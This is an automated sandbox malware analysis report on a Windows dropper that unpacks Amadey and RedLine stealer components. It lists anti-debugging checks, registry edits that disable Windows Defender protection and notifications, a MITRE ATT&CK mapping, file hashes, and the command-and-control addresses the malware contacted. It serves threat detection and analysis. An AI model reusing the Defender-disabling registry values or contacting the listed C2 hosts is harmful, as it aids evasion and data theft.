Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe TID: 6448	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe TID: 6636	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe

Code function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

6_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Source: C:\Users\user\Desktop\d3HccaLUT7.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_2-2449
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_3-2451
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_1-2450

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\d3HccaLUT7.exe

Code function: 0_2_00405467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,

0_2_00405467

Source: C:\Users\user\Desktop\d3HccaLUT7.exe	Code function: 0_2_00402390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00402390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	Code function: 1_2_00302390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_00302390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe	Code function: 2_2_00FC2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	2_2_00FC2390
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe	Code function: 3_2_00B82390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	3_2_00B82390

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe

Code function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

6_2_0040CE09

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe

6_2_004019F0

Source: C:\Users\user\Desktop\d3HccaLUT7.exe

Code function: 0_2_00402F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

0_2_00402F1D

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe

Code function: 6_2_0040ADB0 GetProcessHeap,HeapFree,

6_2_0040ADB0

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\d3HccaLUT7.exe

Code function: 0_2_067B00A3 push dword ptr fs:[00000030h]

0_2_067B00A3

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\d3HccaLUT7.exe	Code function: 0_2_00406F40 SetUnhandledExceptionFilter,	0_2_00406F40
Source: C:\Users\user\Desktop\d3HccaLUT7.exe	Code function: 0_2_00406CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00406CF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	Code function: 1_2_00306F40 SetUnhandledExceptionFilter,	1_2_00306F40
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	Code function: 1_2_00306CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00306CF0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe	Code function: 2_2_00FC6F40 SetUnhandledExceptionFilter,	2_2_00FC6F40
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe	Code function: 2_2_00FC6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00FC6CF0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe	Code function: 3_2_00B86F40 SetUnhandledExceptionFilter,	3_2_00B86F40
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe	Code function: 3_2_00B86CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00B86CF0
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_0040CE09
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_0040E61C
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00416F6A
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Code function: 6_2_004123F1 SetUnhandledExceptionFilter,	6_2_004123F1

Source: C:\Users\user\Desktop\d3HccaLUT7.exe

Code function: 0_2_004017EE LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,

0_2_004017EE

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe

Code function: GetLocaleInfoA,

6_2_00417A20

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\d3HccaLUT7.exe

Code function: 0_2_00407155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00407155

Source: C:\Users\user\Desktop\d3HccaLUT7.exe

Code function: 0_2_00402BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,

0_2_00402BFB

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe

Code function: 4_2_00007FF81466077D GetUserNameA,

4_2_00007FF81466077D

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender real time protection (registry)

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1

Jump to behavior

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Jump to behavior

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: 6.2.con1332.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.con1332.exe.2c20e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.kino0095.exe.5160220.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.con1332.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.con1332.exe.2c50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.kino0095.exe.5160220.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000003.345850863.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.308943613.00000000050B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.370376252.0000000002C20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe, type: DROPPED

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 0.3.d3HccaLUT7.exe.7068a20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.d3HccaLUT7.exe.7068a20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.307856775.0000000006F97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe, type: DROPPED

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: 6.2.con1332.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.con1332.exe.2c20e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.kino0095.exe.5160220.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.con1332.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.con1332.exe.2c50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.kino0095.exe.5160220.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000003.345850863.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.308943613.00000000050B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.370376252.0000000002C20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	3 Native API	1 Windows Service	2 Bypass User Access Control	21 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Service Execution	Logon Script (Windows)	1 Windows Service	3 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 Process Injection	22 Software Packing	NTDS	26 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	13 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Bypass User Access Control	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Masquerading	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	21 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Owner/User Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Access Token Manipulation	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Process Injection	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	1 Rundll32	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
d3HccaLUT7.exe	46%	Virustotal		Browse
d3HccaLUT7.exe	41%	ReversingLabs	Win32.Trojan.Generic
d3HccaLUT7.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	100%	Avira	HEUR/AGEN.1252166
C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe	100%	Avira	HEUR/AGEN.1252166
C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe	63%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe	80%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe	58%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe	88%	ReversingLabs	Win32.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.Casdet

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.0.kino0095.exe.300000.0.unpack	100%	Avira	HEUR/AGEN.1252166	Download File
3.3.kino0588.exe.4c26c20.0.unpack	100%	Avira	HEUR/AGEN.1253311	Download File
1.2.kino0095.exe.300000.0.unpack	100%	Avira	HEUR/AGEN.1252166	Download File
0.2.d3HccaLUT7.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1252166	Download File
2.3.kino2456.exe.482f420.0.unpack	100%	Avira	HEUR/AGEN.1253311	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
31.41.244.200/games/category/index.php	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
193.233.20.30:4125	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
31.41.244.200/games/category/index.php	true	URL Reputation: safe	low
193.233.20.30:4125	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ip.sb/ip	kino0095.exe, 00000001.00000003.308943613.00000000050B2000.00000004.00000020.00020000.00000000.sdmp, en675431.exe.1.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	829684
Start date and time:	2023-03-18 21:04:17 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	d3HccaLUT7.exe
Original Sample Name:	d226c85940774672726af5fb360fc1de.exe
Detection:	MAL
Classification:	mal93.troj.spyw.evad.winEXE@15/10@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 64.7% (good quality ratio 62.1%) Quality average: 85.1% Quality standard deviation: 23.8%
HCA Information:	Successful, ratio: 94% Number of executed functions: 141 Number of non-executed functions: 147
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtProtectVirtualMemory calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe	szDGo5lHdI.exe	Get hash	malicious	Amadey, RedLine	Browse
	bCHMhfe2vn.exe	Get hash	malicious	Amadey, RedLine	Browse
	JWwmlPG6T4.exe	Get hash	malicious	Amadey, RedLine	Browse
	lz1sDblrYC.exe	Get hash	malicious	Amadey, RedLine	Browse
	2OFtBU6Tvq.exe	Get hash	malicious	Amadey, RedLine	Browse
	tb5QNVq4tA.exe	Get hash	malicious	Amadey, RedLine	Browse
	wD1HavDmzM.exe	Get hash	malicious	Amadey, RedLine	Browse
	d1CNSOQG6J.exe	Get hash	malicious	Amadey, RedLine	Browse
	amXdEMvtjh.exe	Get hash	malicious	Amadey, RedLine	Browse
	qRIHmQVYic.exe	Get hash	malicious	Amadey, RedLine	Browse
	oPHmWw9Rxf.exe	Get hash	malicious	Amadey, RedLine	Browse
	geMizFBwNi.exe	Get hash	malicious	Amadey, RedLine	Browse
	setup.exe	Get hash	malicious	Amadey, RedLine	Browse
	E8DQP4nJIj.exe	Get hash	malicious	Amadey, RedLine	Browse
	r0cTE8cVSm.exe	Get hash	malicious	Amadey, RedLine	Browse
	xj1TpEtv4z.exe	Get hash	malicious	Amadey, RedLine	Browse
	FmgrIPCiXX.exe	Get hash	malicious	Amadey, RedLine	Browse
	yTiVDw9gIM.exe	Get hash	malicious	Amadey, RedLine	Browse
	no5jA7VYxT.exe	Get hash	malicious	Amadey, RedLine	Browse
	WqPen4qUki.exe	Get hash	malicious	Amadey, RedLine	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\bus9402.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.354940450065058
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
MD5:	B10E37251C5B495643F331DB2EEC3394
SHA1:	25A5FFE4C2554C2B9A7C2794C9FE215998871193
SHA-256:	8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
SHA-512:	296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\con1332.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	321
Entropy (8bit):	5.355221377978991
Encrypted:	false
SSDEEP:	6:Q3La/xwchM3RJoDLIP12MUAvvR+uCqDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21v
MD5:	03C5BA5FCE7124B503EA65EF522177C3
SHA1:	F76B1F538D5EA66664355901E927B2F870ACCDD8
SHA-256:	8128CE419BBE0419F1A0BDE97C3A14E3377C0184DC1D7AF61AA01AAB756B625B
SHA-512:	151A974DDABA852144EC4BC18C548227A32E5261736F186A3920F2497434AEE9DBB0E0AB77E0E52A84A9FBC4529A158882B7549763400DDC2082D384B1135141
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..

C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe

Download File

Process:	C:\Users\user\Desktop\d3HccaLUT7.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	231424
Entropy (8bit):	6.351317966279805
Encrypted:	false
SSDEEP:	6144:4rzyIG8IcCnD5A2QdY8rWpau1CYUqfhYdMBg:KmlLnD5qdY8Fu1CYUehrBg
MD5:	8627EBE3777CC777ED2A14B907162224
SHA1:	06EEED93EB3094F9D0B13AC4A6936F7088FBBDAA
SHA-256:	319B22945BEEB7424FE6DB1E9953AD5F2DC12CBBA2FE24E599C3DEDA678893BB
